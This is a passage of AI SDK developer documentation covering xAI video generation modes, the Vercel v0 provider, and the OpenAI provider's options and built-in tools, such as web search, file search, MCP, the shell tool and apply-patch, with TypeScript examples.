model: xai.video('grok-imagine-video'),
prompt: 'Add sunglasses',
providerOptions: {
xai: { mode: 'edit-video', videoUrl: step1VideoUrl, pollTimeoutMs: 600000 },
},
}),
generateVideo({
model: xai.video('grok-imagine-video'),
prompt: 'Add a scarf',
providerOptions: {
xai: { mode: 'edit-video', videoUrl: step1VideoUrl, pollTimeoutMs: 600000 },
},
}),
]);
Video Extension
Extend an existing video from its last frame. The duration controls the length of the extension only, not the total output. The output inherits aspectRatio and resolution from the source video.
import { xai, type XaiVideoModelOptions } from '@ai-sdk/xai';
import { experimental_generateVideo as generateVideo } from 'ai';
// Step 1: Generate a source video
const source = await generateVideo({
model: xai.video('grok-imagine-video'),
prompt: 'A cat sitting on a sunlit windowsill, tail gently swishing.',
duration: 5,
aspectRatio: '16:9',
providerOptions: {
xai: {
pollTimeoutMs: 600000,
} satisfies XaiVideoModelOptions,
},
});
const sourceUrl = source.providerMetadata?.xai?.videoUrl as string;
// Step 2: Extend the video with a new scene
const extended = await generateVideo({
model: xai.video('grok-imagine-video'),
prompt: 'The cat turns its head, notices a butterfly, and leaps off.',
duration: 6,
providerOptions: {
xai: {
mode: 'extend-video',
videoUrl: sourceUrl,
pollTimeoutMs: 600000,
} satisfies XaiVideoModelOptions,
},
});
Reference-to-Video (R2V)
Provide reference images to guide the video's style and content. Unlike image-to-video, reference images are not used as the first frame — the model incorporates their visual elements into the generated video. Each reference image can be a public HTTPS URL or a base64 data URI.
import { xai, type XaiVideoModelOptions } from '@ai-sdk/xai';
import { experimental_generateVideo as generateVideo } from 'ai';
const { video } = await generateVideo({
model: xai.video('grok-imagine-video'),
prompt:
'The comic cat from <IMAGE_1> and the comic dog from <IMAGE_2> ' +
'are having a playful chase through a sunlit park. ' +
'Cinematic slow-motion, warm afternoon light.',
duration: 8,
aspectRatio: '16:9',
providerOptions: {
xai: {
mode: 'reference-to-video',
referenceImageUrls: [
'https://example.com/comic-cat.png',
'https://example.com/comic-dog.png',
],
pollTimeoutMs: 600000,
} satisfies XaiVideoModelOptions,
},
});
Use <IMAGE_1>, <IMAGE_2>, etc. in your prompt to reference specific images. Up to 7 reference images are supported per request.
Video Provider Options
The following provider options are available via providerOptions.xai.
You can validate the provider options using the XaiVideoModelOptions type.
-
pollIntervalMs number
Polling interval in milliseconds for checking task status. Defaults to 5000.
-
pollTimeoutMs number
Maximum wait time in milliseconds for video generation. Defaults to 600000 (10 minutes).
-
resolution '480p' | '720p'
Video resolution. When using the SDK's standard
resolution parameter, 1280x720 maps to 720p and 854x480 maps to 480p. Use this provider option to pass the native format directly. -
mode 'edit-video' | 'extend-video' | 'reference-to-video'
Selects the explicit video operation. Each mode is mutually exclusive:
- 'edit-video' — edit an existing video (requires videoUrl)
- 'extend-video' — extend a video from its last frame (requires videoUrl)
- 'reference-to-video' — generate from reference images (requires referenceImageUrls)
When omitted, standard generation is used. Legacy inputs are still auto-detected from fields for backward compatibility.
-
videoUrl string
URL of a source video. Used with
mode: 'edit-video' for video editing and mode: 'extend-video' for video extension. -
referenceImageUrls string[]
Array of reference image URLs (1–7 images) or base64 data URIs for reference-to-video (R2V) generation. The model incorporates visual elements from these images without using them as the first frame. Use
<IMAGE_1>, <IMAGE_2>, etc. in the prompt to reference specific images. Used with mode: 'reference-to-video'.
Aspect Ratio and Resolution
For text-to-video, you can specify both aspectRatio and resolution.
The default aspect ratio is 16:9 and the default resolution is 480p.
For image-to-video, the output defaults to the input image's aspect ratio.
If you specify aspectRatio, it will override this and stretch the image to the
desired ratio.
For video editing, the output matches the input video's aspect ratio and
resolution. Custom duration, aspectRatio, and resolution are not
supported — the output resolution is capped at 720p (e.g., a 1080p input
will be downsized to 720p).
For video extension, the output inherits aspectRatio and resolution
from the source video. duration is supported and controls only the
extension length.
For reference-to-video (R2V), you can specify duration, aspectRatio,
and resolution just like text-to-video.
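For instance, a minimal text-to-video sketch that overrides both defaults (the prompt is illustrative):
import { xai, type XaiVideoModelOptions } from '@ai-sdk/xai';
import { experimental_generateVideo as generateVideo } from 'ai';
const { video } = await generateVideo({
  model: xai.video('grok-imagine-video'),
  prompt: 'A paper boat drifting down a rain-soaked street.',
  aspectRatio: '9:16', // default is 16:9
  resolution: '1280x720', // maps to 720p; default is 480p
  duration: 5,
  providerOptions: {
    xai: {
      pollTimeoutMs: 600000,
    } satisfies XaiVideoModelOptions,
  },
});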
Video Model Capabilities
| Model | Duration | Aspect Ratios | Resolution | Image-to-Video | Editing | Extension | R2V |
|---|---|---|---|---|---|---|---|
|---|---|---|---|---|---|---|---|
| grok-imagine-video | 1–15s | 1:1, 16:9, 9:16, 4:3, 3:4, 3:2, 2:3 | 480p, 720p | | | | |
title: Vercel description: Learn how to use Vercel's v0 models with the AI SDK.
Vercel Provider
The Vercel provider gives you access to the v0 API, designed for building modern web applications. The v0 models support text and image inputs and provide fast streaming responses.
You can create your Vercel API key at v0.dev.
Features
- Framework aware completions: Evaluated on modern stacks like Next.js and Vercel
- Auto-fix: Identifies and corrects common coding issues during generation
- Quick edit: Streams inline edits as they're available
- Multimodal: Supports both text and image inputs
Setup
The Vercel provider is available via the @ai-sdk/vercel module. You can install it with:
pnpm add @ai-sdk/vercel
Provider Instance
You can import the default provider instance vercel from @ai-sdk/vercel:
import { vercel } from '@ai-sdk/vercel';
If you need a customized setup, you can import createVercel from @ai-sdk/vercel and create a provider instance with your settings:
import { createVercel } from '@ai-sdk/vercel';
const vercel = createVercel({
apiKey: process.env.VERCEL_API_KEY ?? '',
});
You can use the following optional settings to customize the Vercel provider instance:
-
baseURL string
Use a different URL prefix for API calls. The default prefix is
https://api.v0.dev/v1. -
apiKey string
API key that is being sent using the
Authorization header. It defaults to the VERCEL_API_KEY environment variable. -
headers Record<string,string>
Custom headers to include in the requests.
-
fetch (input: RequestInfo, init?: RequestInit) => Promise<Response>
Custom fetch implementation. Defaults to the global
fetch function. You can use it as a middleware to intercept requests, or to provide a custom fetch implementation for e.g. testing.
Language Models
You can create language models using a provider instance. The first argument is the model ID, for example:
import { vercel } from '@ai-sdk/vercel';
import { generateText } from 'ai';
const { text } = await generateText({
model: vercel('v0-1.5-md'),
prompt: 'Create a Next.js AI chatbot',
});
Vercel language models can also be used in the streamText function (see AI SDK Core).
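As a minimal sketch, the same model with streamText:
import { vercel } from '@ai-sdk/vercel';
import { streamText } from 'ai';
const result = streamText({
  model: vercel('v0-1.5-md'),
  prompt: 'Create a Next.js AI chatbot',
});
for await (const textPart of result.textStream) {
  process.stdout.write(textPart);
}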
Models
v0-1.5-md
The v0-1.5-md model is for everyday tasks and UI generation.
v0-1.5-lg
The v0-1.5-lg model is for advanced thinking or reasoning.
v0-1.0-md (legacy)
The v0-1.0-md model is the legacy model served by the v0 API.
All v0 models have the following capabilities:
- Supports text and image inputs (multimodal)
- Supports function/tool calls
- Streaming responses with low latency
- Optimized for frontend and full-stack web development
Model Capabilities
| Model | Image Input | Object Generation | Tool Usage | Tool Streaming |
|---|---|---|---|---|
| v0-1.5-md | | | | |
| v0-1.5-lg | | | | |
| v0-1.0-md | | | | |
title: OpenAI description: Learn how to use the OpenAI provider for the AI SDK.
OpenAI Provider
The OpenAI provider contains language model support for the OpenAI responses, chat, and completion APIs, as well as embedding model support for the OpenAI embeddings API.
Setup
The OpenAI provider is available in the @ai-sdk/openai module. You can install it with
pnpm add @ai-sdk/openai
Provider Instance
You can import the default provider instance openai from @ai-sdk/openai:
import { openai } from '@ai-sdk/openai';
If you need a customized setup, you can import createOpenAI from @ai-sdk/openai and create a provider instance with your settings:
import { createOpenAI } from '@ai-sdk/openai';
const openai = createOpenAI({
// custom settings, e.g.
headers: {
'header-name': 'header-value',
},
});
You can use the following optional settings to customize the OpenAI provider instance:
-
baseURL string
Use a different URL prefix for API calls, e.g. to use proxy servers. The default prefix is
https://api.openai.com/v1. -
apiKey string
API key that is being sent using the
Authorization header. It defaults to the OPENAI_API_KEY environment variable. -
name string
The provider name. You can set this when using OpenAI compatible providers to change the model provider property. Defaults to
openai. -
organization string
OpenAI Organization.
-
project string
OpenAI project.
-
headers Record<string,string>
Custom headers to include in the requests.
-
fetch (input: RequestInfo, init?: RequestInit) => Promise<Response>
Custom fetch implementation. Defaults to the global
fetch function. You can use it as a middleware to intercept requests, or to provide a custom fetch implementation for e.g. testing.
Language Models
The OpenAI provider instance is a function that you can invoke to create a language model:
const model = openai('gpt-5');
It automatically selects the correct API based on the model id. You can also pass additional settings in the second argument:
const model = openai('gpt-5', {
// additional settings
});
The available options depend on the API that's automatically chosen for the model (see below).
If you want to explicitly select a specific model API, you can use .responses, .chat, or .completion.
Example
You can use OpenAI language models to generate text with the generateText function:
import { openai } from '@ai-sdk/openai';
import { generateText } from 'ai';
const { text } = await generateText({
model: openai('gpt-5'),
prompt: 'Write a vegetarian lasagna recipe for 4 people.',
});
OpenAI language models can also be used in the streamText function
and support structured data generation with Output
(see AI SDK Core).
Responses Models
You can use the OpenAI responses API with the openai(modelId) or openai.responses(modelId) factory methods. It is the default API that is used by the OpenAI provider (since AI SDK 5).
const model = openai('gpt-5');
Further configuration can be done using OpenAI provider options.
You can validate the provider options using the OpenAILanguageModelResponsesOptions type.
import { openai, OpenAILanguageModelResponsesOptions } from '@ai-sdk/openai';
import { generateText } from 'ai';
const result = await generateText({
model: openai('gpt-5'), // or openai.responses('gpt-5')
providerOptions: {
openai: {
parallelToolCalls: false,
store: false,
user: 'user_123',
// ...
} satisfies OpenAILanguageModelResponsesOptions,
},
// ...
});
The following provider options are available:
-
parallelToolCalls boolean Whether to use parallel tool calls. Defaults to
true. -
store boolean
Whether to store the generation. Defaults to
true. -
maxToolCalls integer The maximum number of total calls to built-in tools that can be processed in a response. This maximum number applies across all built-in tool calls, not per individual tool. Any further attempts to call a tool by the model will be ignored.
-
metadata Record<string, string> Additional metadata to store with the generation.
-
conversation string The ID of the OpenAI Conversation to continue. You must create a conversation first via the OpenAI API. Cannot be used in conjunction with
previousResponseId. Defaults to undefined. -
previousResponseId string The ID of the previous response. You can use it to continue a conversation. Defaults to
undefined. -
instructions string Instructions for the model. They can be used to change the system or developer message when continuing a conversation using the
previousResponseId option. Defaults to undefined. -
logprobs boolean | number Return the log probabilities of the tokens. Including logprobs will increase the response size and can slow down response times. However, it can be useful to better understand how the model is behaving. Setting to
true returns the log probabilities of the tokens that were generated. Setting to a number (1-20) returns the log probabilities of the top n tokens that were generated. -
user string A unique identifier representing your end-user, which can help OpenAI to monitor and detect abuse. Defaults to
undefined. -
reasoningEffort 'none' | 'minimal' | 'low' | 'medium' | 'high' | 'xhigh' Reasoning effort for reasoning models. Defaults to
medium. If you use providerOptions to set the reasoningEffort option, this model setting will be ignored.
-
reasoningSummary 'auto' | 'detailed' Controls whether the model returns its reasoning process. Set to
'auto' for a condensed summary, 'detailed' for more comprehensive reasoning. Defaults to undefined (no reasoning summaries). When enabled, reasoning summaries appear in the stream as events with type 'reasoning' and in non-streaming responses within the reasoning field. -
strictJsonSchema boolean Whether to use strict JSON schema validation. Defaults to
true.
-
serviceTier 'auto' | 'flex' | 'priority' | 'default' Service tier for the request. Set to 'flex' for 50% cheaper processing at the cost of increased latency (available for o3, o4-mini, and gpt-5 models). Set to 'priority' for faster processing with Enterprise access (available for gpt-4, gpt-5, gpt-5-mini, o3, o4-mini; gpt-5-nano is not supported).
Defaults to 'auto'.
-
textVerbosity 'low' | 'medium' | 'high' Controls the verbosity of the model's response. Lower values result in more concise responses, while higher values result in more verbose responses. Defaults to
'medium'. -
include Array<string> Specifies additional content to include in the response. Supported values:
['file_search_call.results'] for including file search results in responses. ['message.output_text.logprobs'] for logprobs. Defaults to undefined. -
truncation string The truncation strategy to use for the model response.
- auto: If the input to this Response exceeds the model's context window size, the model will truncate the response to fit the context window by dropping items from the beginning of the conversation.
- disabled (default): If the input size will exceed the context window size for a model, the request will fail with a 400 error.
-
promptCacheKey string A cache key for manual prompt caching control. Used by OpenAI to cache responses for similar requests to optimize your cache hit rates.
-
promptCacheRetention 'in_memory' | '24h' The retention policy for the prompt cache. Set to
'24h' to enable extended prompt caching, which keeps cached prefixes active for up to 24 hours. Defaults to 'in_memory' for standard prompt caching. Note: '24h' is currently only available for the 5.1 series of models. -
safetyIdentifier string A stable identifier used to help detect users of your application that may be violating OpenAI's usage policies. The IDs should be a string that uniquely identifies each user.
-
systemMessageMode 'system' | 'developer' | 'remove' Controls the role of the system message when making requests. By default (when omitted), for models that support reasoning the
system message is automatically converted to a developer message. Setting systemMessageMode to system passes the system message as a system-level instruction; developer passes it as a developer message; remove omits the system message from the request. -
forceReasoning boolean Force treating this model as a reasoning model. This is useful for "stealth" reasoning models (e.g. via a custom baseURL) where the model ID is not recognized by the SDK's allowlist. When enabled, the SDK applies reasoning-model parameter compatibility rules and defaults
systemMessageMode to developer unless overridden.
The OpenAI responses provider also returns provider-specific metadata:
For Responses models, you can type this metadata using OpenaiResponsesProviderMetadata:
import { openai, type OpenaiResponsesProviderMetadata } from '@ai-sdk/openai';
import { generateText } from 'ai';
const result = await generateText({
model: openai('gpt-5'),
});
const providerMetadata = result.providerMetadata as
| OpenaiResponsesProviderMetadata
| undefined;
const { responseId, logprobs, serviceTier } = providerMetadata?.openai ?? {};
// responseId can be used to continue a conversation (previousResponseId).
console.log(responseId);
The following OpenAI-specific metadata may be returned:
- responseId string | null | undefined The ID of the response. Can be used to continue a conversation.
- logprobs (optional) Log probabilities of output tokens (when enabled).
- serviceTier (optional) Service tier information returned by the API.
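As a sketch, the returned responseId can feed a follow-up request (the prompts are illustrative):
import {
  openai,
  type OpenAILanguageModelResponsesOptions,
  type OpenaiResponsesProviderMetadata,
} from '@ai-sdk/openai';
import { generateText } from 'ai';
const first = await generateText({
  model: openai('gpt-5'),
  prompt: 'Pick a random city.',
});
const { responseId } = (
  first.providerMetadata as OpenaiResponsesProviderMetadata | undefined
)?.openai ?? {};
// continue the conversation from the previous response
const followUp = await generateText({
  model: openai('gpt-5'),
  prompt: 'What country is it in?',
  providerOptions: {
    openai: {
      previousResponseId: responseId ?? undefined,
    } satisfies OpenAILanguageModelResponsesOptions,
  },
});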
Reasoning Output
For reasoning models like gpt-5, you can enable reasoning summaries to see the model's thought process. Different models support different summarizers—for example, o4-mini supports detailed summaries. Set reasoningSummary: "auto" to automatically receive the richest level available.
import {
openai,
type OpenAILanguageModelResponsesOptions,
} from '@ai-sdk/openai';
import { streamText } from 'ai';
const result = streamText({
model: openai('gpt-5'),
prompt: 'Tell me about the Mission burrito debate in San Francisco.',
providerOptions: {
openai: {
reasoningSummary: 'detailed', // 'auto' for condensed or 'detailed' for comprehensive
} satisfies OpenAILanguageModelResponsesOptions,
},
});
for await (const part of result.fullStream) {
  if (part.type === 'reasoning-delta') {
    console.log(`Reasoning: ${part.text}`);
  } else if (part.type === 'text-delta') {
    process.stdout.write(part.text);
  }
}
For non-streaming calls with generateText, the reasoning summaries are available in the reasoning field of the response:
import {
openai,
type OpenAILanguageModelResponsesOptions,
} from '@ai-sdk/openai';
import { generateText } from 'ai';
const result = await generateText({
model: openai('gpt-5'),
prompt: 'Tell me about the Mission burrito debate in San Francisco.',
providerOptions: {
openai: {
reasoningSummary: 'auto',
} satisfies OpenAILanguageModelResponsesOptions,
},
});
console.log('Reasoning:', result.reasoning);
Learn more about reasoning summaries in the OpenAI documentation.
WebSocket Transport
OpenAI's WebSocket API keeps a persistent connection open, which can significantly reduce Time-to-First-Byte (TTFB) in agentic workflows with many tool calls. After the initial connection, subsequent requests skip TCP/TLS/HTTP negotiation entirely.
The ai-sdk-openai-websocket-fetch
package provides a drop-in fetch replacement that routes streaming requests
through a persistent WebSocket connection.
pnpm add ai-sdk-openai-websocket-fetch
Pass the WebSocket fetch to createOpenAI via the fetch option:
import { createOpenAI } from '@ai-sdk/openai';
import { createWebSocketFetch } from 'ai-sdk-openai-websocket-fetch';
import { streamText } from 'ai';
// Create a WebSocket-backed fetch instance
const wsFetch = createWebSocketFetch();
const openai = createOpenAI({ fetch: wsFetch });
const result = streamText({
model: openai('gpt-4.1-mini'),
prompt: 'Hello!',
tools: {
// ...
},
onFinish: () => wsFetch.close(), // close the WebSocket when done
});
The first request will be slower because it must establish the WebSocket connection (DNS + TCP + TLS + WebSocket upgrade). After that, subsequent steps in a multi-step tool-calling loop reuse the open connection, resulting in lower TTFB per step.
You can see a live side-by-side comparison of HTTP vs WebSocket streaming performance in the demo app.
Verbosity Control
You can control the length and detail of model responses using the textVerbosity parameter:
import {
openai,
type OpenAILanguageModelResponsesOptions,
} from '@ai-sdk/openai';
import { generateText } from 'ai';
const result = await generateText({
model: openai('gpt-5-mini'),
prompt: 'Write a poem about a boy and his first pet dog.',
providerOptions: {
openai: {
textVerbosity: 'low', // 'low' for concise, 'medium' (default), or 'high' for verbose
} satisfies OpenAILanguageModelResponsesOptions,
},
});
The textVerbosity parameter scales output length without changing the underlying prompt:
- 'low': Produces terse, minimal responses
- 'medium': Balanced detail (default)
- 'high': Verbose responses with comprehensive detail
Web Search Tool
The OpenAI responses API supports web search through the openai.tools.webSearch tool.
const result = await generateText({
model: openai('gpt-5'),
prompt: 'What happened in San Francisco last week?',
tools: {
web_search: openai.tools.webSearch({
// optional configuration:
externalWebAccess: true,
searchContextSize: 'high',
userLocation: {
type: 'approximate',
city: 'San Francisco',
region: 'California',
},
filters: {
allowedDomains: ['sfchronicle.com', 'sfgate.com'],
},
}),
},
// Force web search tool (optional):
toolChoice: { type: 'tool', toolName: 'web_search' },
});
// URL sources directly from `results`
const sources = result.sources;
// Or access sources from tool results
for (const toolResult of result.toolResults) {
if (toolResult.toolName === 'web_search') {
console.log('Query:', toolResult.output.action.query);
console.log('Sources:', toolResult.output.sources);
// `sources` is an array of object: { type: 'url', url: string }
}
}
The web search tool supports the following configuration options:
- externalWebAccess boolean - Whether to use external web access for fetching live content. Defaults to true.
- searchContextSize 'low' | 'medium' | 'high' - Controls the amount of context used for the search. Higher values provide more comprehensive results but may have higher latency and cost.
- userLocation - Optional location information to provide geographically relevant results. Includes type (always 'approximate'), country, city, region, and timezone.
- filters - Optional filter configuration to restrict search results.
- allowedDomains string[] - Array of allowed domains for the search. Subdomains of the provided domains are automatically included.
For detailed information on configuration options see the OpenAI Web Search Tool documentation.
File Search Tool
The OpenAI responses API supports file search through the openai.tools.fileSearch tool.
You can force the use of the file search tool by setting the toolChoice parameter to { type: 'tool', toolName: 'file_search' }.
const result = await generateText({
model: openai('gpt-5'),
prompt: 'What does the document say about user authentication?',
tools: {
file_search: openai.tools.fileSearch({
vectorStoreIds: ['vs_123'],
// configuration below is optional:
maxNumResults: 5,
filters: {
key: 'author',
type: 'eq',
value: 'Jane Smith',
},
ranking: {
ranker: 'auto',
scoreThreshold: 0.5,
},
}),
},
providerOptions: {
openai: {
// optional: include results
include: ['file_search_call.results'],
} satisfies OpenAILanguageModelResponsesOptions,
},
});
The file search tool supports filtering with both comparison and compound filters:
Comparison filters - Filter by a single attribute:
- eq - Equal to
- ne - Not equal to
- gt - Greater than
- gte - Greater than or equal to
- lt - Less than
- lte - Less than or equal to
- in - Value is in array
- nin - Value is not in array
// Single comparison filter
filters: { key: 'year', type: 'gte', value: 2023 }
// Filter with array values
filters: { key: 'status', type: 'in', value: ['published', 'reviewed'] }
Compound filters - Combine multiple filters with and or or:
// Compound filter with AND
filters: {
type: 'and',
filters: [
{ key: 'author', type: 'eq', value: 'Jane Smith' },
{ key: 'year', type: 'gte', value: 2023 },
],
}
// Compound filter with OR
filters: {
type: 'or',
filters: [
{ key: 'department', type: 'eq', value: 'Engineering' },
{ key: 'department', type: 'eq', value: 'Research' },
],
}
Image Generation Tool
OpenAI's Responses API supports multi-modal image generation as a provider-defined tool.
Availability is restricted to specific models (for example, gpt-5 variants).
You can use the image tool with either generateText or streamText:
import { openai } from '@ai-sdk/openai';
import { generateText } from 'ai';
const result = await generateText({
model: openai('gpt-5'),
prompt:
'Generate an image of an echidna swimming across the Mozambique channel.',
tools: {
image_generation: openai.tools.imageGeneration({ outputFormat: 'webp' }),
},
});
for (const toolResult of result.staticToolResults) {
if (toolResult.toolName === 'image_generation') {
const base64Image = toolResult.output.result;
}
}
import { openai } from '@ai-sdk/openai';
import { streamText } from 'ai';
const result = streamText({
model: openai('gpt-5'),
prompt:
'Generate an image of an echidna swimming across the Mozambique channel.',
tools: {
image_generation: openai.tools.imageGeneration({
outputFormat: 'webp',
quality: 'low',
}),
},
});
for await (const part of result.fullStream) {
if (part.type == 'tool-result' && !part.dynamic) {
const base64Image = part.output.result;
}
}
For complete details on model availability, image quality controls, supported sizes, and tool-specific parameters, refer to the OpenAI documentation:
- Image generation overview and models: OpenAI Image Generation
- Image generation tool parameters (background, size, quality, format, etc.): Image Generation Tool Options
Code Interpreter Tool
The OpenAI responses API supports the code interpreter tool through the openai.tools.codeInterpreter tool.
This allows models to write and execute Python code.
import { openai } from '@ai-sdk/openai';
import { generateText } from 'ai';
const result = await generateText({
model: openai('gpt-5'),
prompt: 'Write and run Python code to calculate the factorial of 10',
tools: {
code_interpreter: openai.tools.codeInterpreter({
// optional configuration:
container: {
fileIds: ['file-123', 'file-456'], // optional file IDs to make available
},
}),
},
});
The code interpreter tool can be configured with:
- container: Either a container ID string or an object with
fileIds to specify uploaded files that should be available to the code interpreter
MCP Tool
The OpenAI responses API supports connecting to Model Context Protocol (MCP) servers through the openai.tools.mcp tool. This allows models to call tools exposed by remote MCP servers or service connectors.
import { openai } from '@ai-sdk/openai';
import { generateText } from 'ai';
const result = await generateText({
model: openai('gpt-5'),
prompt: 'Search the web for the latest news about AI developments',
tools: {
mcp: openai.tools.mcp({
serverLabel: 'web-search',
serverUrl: 'https://mcp.exa.ai/mcp',
serverDescription: 'A web-search API for AI agents',
}),
},
});
The MCP tool can be configured with:
-
serverLabel string (required)
A label to identify the MCP server. This label is used in tool calls to distinguish between multiple MCP servers.
-
serverUrl string (required if
connectorId is not provided). The URL for the MCP server. Either
serverUrl or connectorId must be provided. -
connectorId string (required if
serverUrl is not provided). Identifier for a service connector. Either
serverUrl or connectorId must be provided. -
serverDescription string (optional)
Optional description of the MCP server that helps the model understand its purpose.
-
allowedTools string[] | object (optional)
Controls which tools from the MCP server are available. Can be:
- An array of tool names: ['tool1', 'tool2']
- An object with filters: { readOnly: true, toolNames: ['tool1', 'tool2'] }, where readOnly restricts to read-only tools and toolNames limits the selection to specific tool names
-
authorization string (optional)
OAuth access token for authenticating with the MCP server or connector.
-
headers Record<string, string> (optional)
Optional HTTP headers to include in requests to the MCP server.
-
requireApproval 'always' | 'never' | object (optional)
Controls which MCP tool calls require user approval before execution. Can be:
- 'always': All MCP tool calls require approval
- 'never': No MCP tool calls require approval (default)
- An object with filters: { never: { toolNames: ['safe_tool', 'another_safe_tool'] } }, which skips approval for the listed tools
When approval is required, the model will return a
tool-approval-request content part that you can use to prompt the user for approval. See Human in the Loop for more details on implementing approval workflows.
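A minimal sketch of an MCP tool with approval gating (the server URL, label, and tool name are placeholders):
import { openai } from '@ai-sdk/openai';
import { generateText } from 'ai';
const result = await generateText({
  model: openai('gpt-5'),
  prompt: 'Look up the weather in San Francisco.',
  tools: {
    mcp: openai.tools.mcp({
      serverLabel: 'weather',
      serverUrl: 'https://example.com/mcp',
      // require approval for every call except the listed read-only tool
      requireApproval: { never: { toolNames: ['get_weather'] } },
    }),
  },
});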
Local Shell Tool
The OpenAI Responses API supports the local shell tool for Codex models through the openai.tools.localShell tool.
Local shell is a tool that allows agents to run shell commands locally on a machine you or the user provides.
import { openai } from '@ai-sdk/openai';
import { generateText, stepCountIs } from 'ai';
const result = await generateText({
model: openai.responses('gpt-5-codex'),
tools: {
local_shell: openai.tools.localShell({
execute: async ({ action }) => {
// ... your implementation, e.g. sandbox access ...
return { output: stdout };
},
}),
},
prompt: 'List the files in my home directory.',
stopWhen: stepCountIs(2),
});
Shell Tool
The OpenAI Responses API supports the shell tool through the openai.tools.shell tool.
The shell tool allows running bash commands and interacting with a command line.
The model proposes shell commands; your integration executes them and returns the outputs.
The shell tool supports three environment modes that control where commands are executed:
Local Execution (default)
When no environment is specified (or type: 'local' is used), commands are executed locally via your execute callback:
import { openai } from '@ai-sdk/openai';
import { generateText } from 'ai';
const result = await generateText({
model: openai('gpt-5.2'),
tools: {
shell: openai.tools.shell({
execute: async ({ action }) => {
// ... your implementation, e.g. sandbox access ...
return { output: results };
},
}),
},
prompt: 'List the files in the current directory and show disk usage.',
});
Hosted Container (auto)
Set environment.type to 'containerAuto' to run commands in an OpenAI-hosted container. No execute callback is needed — OpenAI handles execution server-side:
const result = await generateText({
model: openai('gpt-5.2'),
tools: {
shell: openai.tools.shell({
environment: {
type: 'containerAuto',
// optional configuration:
memoryLimit: '4g',
fileIds: ['file-abc123'],
networkPolicy: {
type: 'allowlist',
allowedDomains: ['example.com'],
},
},
}),
},
prompt: 'Install numpy and compute the eigenvalues of a 3x3 matrix.',
});
The containerAuto environment supports:
- fileIds string[] - File IDs to make available in the container
- memoryLimit '1g' | '4g' | '16g' | '64g' - Memory limit for the container
- networkPolicy - Network access policy:
  - { type: 'disabled' } - no network access
  - { type: 'allowlist', allowedDomains: string[], domainSecrets?: Array<{ domain, name, value }> } - allow specific domains with optional secrets
Existing Container Reference
Set environment.type to 'containerReference' to use an existing container by ID:
const result = await generateText({
model: openai('gpt-5.2'),
tools: {
shell: openai.tools.shell({
environment: {
type: 'containerReference',
containerId: 'cntr_abc123',
},
}),
},
prompt: 'Check the status of running processes.',
});
Execute Callback
For local execution (default or type: 'local'), your execute function must return an output array with results for each command:
- stdout string - Standard output from the command
- stderr string - Standard error from the command
- outcome - Either { type: 'timeout' } or { type: 'exit', exitCode: number }
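As a minimal sketch, assuming action carries a commands array of shell command strings (check the SDK types for the exact action shape), a local execute callback might look like this. Never run model-proposed commands outside a sandbox you control:
import { execSync } from 'node:child_process';
import { openai } from '@ai-sdk/openai';
import { generateText } from 'ai';
const result = await generateText({
  model: openai('gpt-5.2'),
  tools: {
    shell: openai.tools.shell({
      execute: async ({ action }) => ({
        // one result entry per proposed command
        output: action.commands.map((command: string) => {
          try {
            const stdout = execSync(command, { encoding: 'utf8', timeout: 10_000 });
            return { stdout, stderr: '', outcome: { type: 'exit', exitCode: 0 } };
          } catch (error) {
            const e = error as { stdout?: string; stderr?: string; status?: number | null };
            return {
              stdout: e.stdout ?? '',
              stderr: e.stderr ?? String(error),
              // a null exit status here is treated as a timeout
              outcome:
                e.status == null
                  ? { type: 'timeout' }
                  : { type: 'exit', exitCode: e.status },
            };
          }
        }),
      }),
    }),
  },
  prompt: 'Show the size of the current directory.',
});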
Skills
Skills are versioned bundles of files with a SKILL.md manifest that extend the shell tool's capabilities. They can be attached to both containerAuto and local environments.
Container skills support two formats — by reference (for skills uploaded to OpenAI) or inline (as a base64-encoded zip):
const result = await generateText({
model: openai('gpt-5.2'),
tools: {
shell: openai.tools.shell({
environment: {
type: 'containerAuto',
skills: [
// By reference:
{ type: 'skillReference', skillId: 'skill_abc123' },
// Or inline:
{
type: 'inline',
name: 'my-skill',
description: 'What this skill does',
source: {
type: 'base64',
mediaType: 'application/zip',
data: readFileSync('./my-skill.zip').toString('base64'),
},
},
],
},
}),
},
prompt: 'Use the skill to solve this problem.',
});
Local skills point to a directory on disk containing a SKILL.md file:
const result = await generateText({
model: openai('gpt-5.2'),
tools: {
shell: openai.tools.shell({
execute: async ({ action }) => {
// ... your local execution implementation ...
return { output: results };
},
environment: {
type: 'local',
skills: [
{
name: 'my-skill',
description: 'What this skill does',
path: resolve('path/to/skill-directory'),
},
],
},
}),
},
prompt: 'Use the skill to solve this problem.',
stopWhen: stepCountIs(5),
});
For more details on creating skills, see the OpenAI Skills documentation.
Apply Patch Tool
The OpenAI Responses API supports the apply patch tool for GPT-5.1 models through the openai.tools.applyPatch tool.
The apply patch tool lets the model create, update, and delete files in your codebase using structured diffs.
Instead of just suggesting edits, the model emits patch operations that your application applies and reports back on,
enabling iterative, multi-step code editing workflows.
import { openai } from '@ai-sdk/openai';
import { generateText, stepCountIs } from 'ai';
const result = await generateText({
model: openai('gpt-5.1'),
tools: {
apply_patch: openai.tools.applyPatch({
execute: async ({ callId, operation }) => {
// ... your implementation for applying the diffs ...
return { status: 'completed' };
},
}),
},
prompt: 'Create a python file that calculates the factorial of a number',
stopWhen: stepCountIs(5),
});
Your execute function must return:
- status 'completed' | 'failed' - Whether the patch was applied successfully
- output string (optional) - Human-readable log text (e.g., results or error messages)
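A minimal sketch of that return shape follows; applyOperationToWorkspace is a hypothetical helper standing in for your own patch-application logic:
import { openai } from '@ai-sdk/openai';
import { generateText, stepCountIs } from 'ai';
// Hypothetical helper that applies a patch operation to your workspace.
declare function applyOperationToWorkspace(operation: unknown): Promise<void>;
const result = await generateText({
  model: openai('gpt-5.1'),
  tools: {
    apply_patch: openai.tools.applyPatch({
      execute: async ({ operation }) => {
        try {
          await applyOperationToWorkspace(operation);
          return { status: 'completed', output: 'Patch applied.' };
        } catch (error) {
          return {
            status: 'failed',
            output: error instanceof Error ? error.message : String(error),
          };
        }
      },
    }),
  },
  prompt: 'Create a python file that calculates the factorial of a number',
  stopWhen: stepCountIs(5),
});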
Tool Search
Tool search allows the model to dynamically search for and load tools into context as needed,
rather than loading all tool definitions up front. This can reduce token usage, cost, and latency
when you have many tools. Mark the tools you want to make searchable with deferLoading: true
in their providerOptions.
There are two execution modes:
- Server-executed (hosted): OpenAI searches across the deferred tools declared in the request and returns the loaded subset in the same response. No extra round-trip is needed.
- Client-executed: The model emits a tool_search_call, your application performs the lookup, and you return the matching tools via the execute callback.
Server-Executed (Hosted) Tool Search
Use hosted tool search when the candidate tools are already known at request time.
Add openai.tools.toolSearch() with no arguments and mark your tools with deferLoading: true:
import { openai } from '@ai-sdk/openai';
